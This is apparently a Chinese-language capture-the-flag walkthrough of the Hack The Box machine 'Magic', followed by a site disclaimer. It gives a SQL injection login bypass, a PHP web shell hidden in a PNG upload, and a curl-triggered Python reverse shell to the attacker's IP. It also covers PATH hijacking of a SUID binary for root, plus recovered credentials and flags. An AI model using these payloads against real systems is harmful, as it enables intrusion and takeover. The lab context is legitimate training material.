信息收集
| IP Address | Opening Ports |
|---|---|
| 10.10.10.185 | TCP:22,80 |
$ nmap -p- 10.10.10.185 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Magic Portfolio
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
SQLI & 文件上传
$ gobuster dir -u 'http://10.10.10.185/' -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -b 403,404 -x php,txt,html
![[Meachines] [Medium] Magic SQLI+文件上传+跳关TRP00F权限提升+…插图](https://img.4awl.net/img/83/69a4cc128b0adeee44ddf94b1da2c9.jpg "[Meachines] [Medium] Magic SQLI+文件上传+跳关TRP00F权限提升+…插图")
Apache2.4.x中间件存在一个向上解析漏洞
![[Meachines] [Medium] Magic SQLI+文件上传+跳关TRP00F权限提升+…插图1](https://img.4awl.net/img/59/ca453707d2d4e89c631f94c5dd4011.jpg "[Meachines] [Medium] Magic SQLI+文件上传+跳关TRP00F权限提升+…插图1")
http://10.10.10.185/login.php
![[Meachines] [Medium] Magic SQLI+文件上传+跳关TRP00F权限提升+…插图2](https://img.4awl.net/img/c2/4b48354a211eedbaa8c0015f6eea27.jpg "[Meachines] [Medium] Magic SQLI+文件上传+跳关TRP00F权限提升+…插图2")
username:admin' or '1'='1password:xxxx
![[Meachines] [Medium] Magic SQLI+文件上传+跳关TRP00F权限提升+…插图3](https://img.4awl.net/img/82/e603332e55d8ae8b5e5faeada37215.jpg "[Meachines] [Medium] Magic SQLI+文件上传+跳关TRP00F权限提升+…插图3")
上传文件
POST /upload.php HTTP/1.1
Host: 10.10.10.185
Content-Length: 365
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.185
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryRSRyaClLcBoHRDRp
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.10.185/upload.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ld7t5k74b1gjfaaevqcu33hcu5
Connection: close
------WebKitFormBoundaryRSRyaClLcBoHRDRp
Content-Disposition: form-data; name="image"; filename="Screenshot_2024-08-08_08_28_47.php.png"
Content-Type: image/png
PNG
<?php system($_GET['cmd']); phpinfo(); ?>
------WebKitFormBoundaryRSRyaClLcBoHRDRp
Content-Disposition: form-data; name="submit"
Upload Image
------WebKitFormBoundaryRSRyaClLcBoHRDRp--
![[Meachines] [Medium] Magic SQLI+文件上传+跳关TRP00F权限提升+…插图4](https://img.4awl.net/img/3d/d6c9fea6f513334776007073852f7e.jpg "[Meachines] [Medium] Magic SQLI+文件上传+跳关TRP00F权限提升+…插图4")
通过主页提供的图片地址可以找到文件
![[Meachines] [Medium] Magic SQLI+文件上传+跳关TRP00F权限提升+…插图5](https://img.4awl.net/img/09/e865ab982047d2106d5e428e3bd7b6.jpg "[Meachines] [Medium] Magic SQLI+文件上传+跳关TRP00F权限提升+…插图5")
curl 'http://10.10.10.185/images/uploads/Screenshot_2024-08-08_08_28_46.php.png?cmd=python3+-c+%27import+socket%2csubprocess%2cos%3bs%3dsocket.socket(socket.AF_INET%2csocket.SOCK_STREAM)%3bs.connect((%2210.10.16.24%22%2c10034))%3bos.dup2(s.fileno()%2c0)%3b+os.dup2(s.fileno()%2c1)%3bos.dup2(s.fileno()%2c2)%3bimport+pty%3b+pty.spawn(%22%2fbin%2fbash%22)%27'
![[Meachines] [Medium] Magic SQLI+文件上传+跳关TRP00F权限提升+…插图6](https://img.4awl.net/img/27/e882aeaba6b9ff09c63a36ecb2aa2d.jpg "[Meachines] [Medium] Magic SQLI+文件上传+跳关TRP00F权限提升+…插图6")
跳关 & TRPP00F
幸运的是可以利用TRP00F进行关卡绕过,直接从www用户到Root
https://github.com/MartinxMax/trp00f
$ python3 trp00f.py --lhost 10.10.16.24 --lport 10011 --rhost 10.10.16.24 --rport 10035 --http 9999
![[Meachines] [Medium] Magic SQLI+文件上传+跳关TRP00F权限提升+…插图7](https://img.4awl.net/img/3e/1e5aa149034096b48fa122ffc4c472.jpg "[Meachines] [Medium] Magic SQLI+文件上传+跳关TRP00F权限提升+…插图7")
www-data to theseus
$ cat /var/www/Magic/db.php5
![[Meachines] [Medium] Magic SQLI+文件上传+跳关TRP00F权限提升+…插图8](https://img.4awl.net/img/9e/c6bb288f50e0314b13156320c57fc2.jpg "[Meachines] [Medium] Magic SQLI+文件上传+跳关TRP00F权限提升+…插图8")
username:theseuspassword:iamkingtheseus
通过chisel将3306转发
![[Meachines] [Medium] Magic SQLI+文件上传+跳关TRP00F权限提升+…插图9](https://img.4awl.net/img/c6/5f989825ecbb3b0e332f7986aa3bc5.jpg "[Meachines] [Medium] Magic SQLI+文件上传+跳关TRP00F权限提升+…插图9")
$ mysql -h 127.0.0.1 -utheseus -p
MySQL [Magic]> select * from Magic.login;
![[Meachines] [Medium] Magic SQLI+文件上传+跳关TRP00F权限提升+…插图10](https://img.4awl.net/img/bb/3424c0bed90e5d2b52e0d5d5d8e130.jpg "[Meachines] [Medium] Magic SQLI+文件上传+跳关TRP00F权限提升+…插图10")
password:Th3s3usW4sK1ng
$ su theseus
![[Meachines] [Medium] Magic SQLI+文件上传+跳关TRP00F权限提升+…插图11](https://img.4awl.net/img/8e/6a4c65bd3077ee0e29d950771ed1ab.jpg "[Meachines] [Medium] Magic SQLI+文件上传+跳关TRP00F权限提升+…插图11")
User.txt
0f8c7dc6b4de6fc370a9d193350ce15c
权限提升
$ find / -perm -4000 -type f 2>/dev/null
![[Meachines] [Medium] Magic SQLI+文件上传+跳关TRP00F权限提升+…插图12](https://img.4awl.net/img/c0/e31531e98cd7a4a10c5d3145726b2d.jpg "[Meachines] [Medium] Magic SQLI+文件上传+跳关TRP00F权限提升+…插图12")
$ strings /bin/sysinfo
![[Meachines] [Medium] Magic SQLI+文件上传+跳关TRP00F权限提升+…插图13](https://img.4awl.net/img/56/a6b0bf65bc22e692f2b3f6beea05ec.jpg "[Meachines] [Medium] Magic SQLI+文件上传+跳关TRP00F权限提升+…插图13")
环境变量劫持
theseus@magic:~$ echo '/bin/bash'>/tmp/cat;chmod +x /tmp/cattheseus@magic:~$ export PATH=/tmp:$PATHtheseus@magic:~$ sysinfo
![[Meachines] [Medium] Magic SQLI+文件上传+跳关TRP00F权限提升+…插图14](https://img.4awl.net/img/28/7be69ac4686e59c11e92f57415af13.jpg "[Meachines] [Medium] Magic SQLI+文件上传+跳关TRP00F权限提升+…插图14")
Root.txt
9f8904b0558514cb9b60c6c6985dddbd
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
